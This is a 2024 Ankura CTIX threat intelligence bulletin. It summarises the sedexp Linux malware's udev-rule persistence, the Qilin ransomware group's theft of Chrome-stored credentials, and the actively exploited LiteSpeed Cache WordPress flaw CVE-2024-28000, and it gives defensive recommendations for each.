Ransomware/Malware Activity
Linux Malware Uses New Mechanism for Persistence, Evades Detection since 2022
Cybersecurity researchers have discovered a piece of Linux malware that has evaded detection through a novel persistence mechanism for at least two (2) years. The ‘sedexp’ malware has been deployed by an unknown threat actor with a likely financial motive given the malware was used to hide credit card scraping code on a web server. The malware persists in a victim Linux machine by crafting a ‘udev’ rule which effectively runs the malware on system restart. udev is a device management system that identifies devices (such as USB drives or storage drives) in the ‘/dev’ directory and allows the configuration of rules to action when there is a change in the device state. The sedexp malware adds a udev rule that effectively runs the malware (“asedexpb”) whenever the precondition is met that major and minor numbers match “/dev/random”. “/dev/random” is an essential system component on Linux which is used as a random number generator, meaning it’s highly likely this precondition will be met on restart, effectively running the malware and establishing persistence. The malware is capable of launching a remote shell to allow attacker access to the host. In addition, sedexp uses memory manipulation techniques to hide its presence on the system, making it very difficult to locate. CTIX analysts recommend that organizations review the udev rules on Linux systems to ensure they are not compromised. CTIX analysts will continue to report on new and emerging malware and associated campaigns.
Threat Actor Activity
Qilin Ransomware Group Stealing Chrome-stored Credentials During Ransomware Attacks
The Qilin ransomware group has recently adopted a new tactic, deploying a custom stealer to harvest account credentials stored in the Google Chrome browser. This new tactic was observed in a ransomware attack where Qilin first gained access to a network via compromised credentials for a VPN portal that lacked multi-factor authentication (MFA). After eighteen (18) days of dormancy, likely used for reconnaissance and mapping the network, the attackers moved laterally to a domain controller. They modified Group Policy Objects (GPOs) to execute a PowerShell script designed to collect credentials stored in Chrome. This script was triggered every time a user logged into their machine, with stolen credentials saved to a shared location and then exfiltrated to Qilin’s command-and-control (C2) server. The attackers then wipe local copies and event logs to conceal their activities before deploying their ransomware payload to encrypt data across the compromised machines. The Qilin ransomware group's shift towards credential harvesting in tangent with ransomware deployment highlights a potential for widespread credential theft across multiple platforms and services, significantly complicating the response to such an incident. Credential theft can provide attackers with a foothold for subsequent attacks or valuable information about high-value targets. This tactic could become a dark new chapter in the ongoing story of cybercrime, as it potentially opens doors to further exploitation by the attackers or other malicious actors. CTIX analysts recommend organizations enforce strict policies against storing sensitive credentials in web browsers and implement multi-factor authentication (MFA).
Vulnerabilities
Critical Vulnerability in LiteSpeed Cache Plugin for Wordpress Under Active Exploitation
A critical vulnerability in LiteSpeed Cache, a WordPress plugin installed on over 5 million websites has been discovered and is already under active exploitation by hackers. The flaw, tracked as CVE-2024-28000, affects all versions up to 6.3.0.1, and allows unauthenticated attackers to escalate their local privileges by brute-forcing a weak hash value, enabling them to create rogue administrator accounts and potentially take over affected sites. The vulnerability was identified on August 19th, 2024, by the Wordfence Threat Intelligence team, who quickly deployed a firewall rule to protect Premium users, while free users will receive the protection on September 19th, 2024. Despite the availability of a patched version (6.4.1), only about 30% of sites have updated, leaving millions still vulnerable. The exploitation of this flaw can lead to severe consequences, including the installation of malicious plugins, alteration of critical settings, and theft of user data. Wordfence has already detected and blocked over 48,500 attacks targeting this vulnerability within twenty-four (24) hours of its details becoming public. This incident marks the second major security issue for LiteSpeed Cache in 2024, highlighting the urgent need for users to update their sites or remove the plugin to prevent potential takeovers. CTIX analysts strongly urge any site administrators affected by this vulnerability to upgrade to the latest patch or remove the plugin temporarily until the free versions are updated.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence about current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence about recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the CTIX Team (ctix@ankura.com) if additional context is needed.
© Copyright 2024. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice
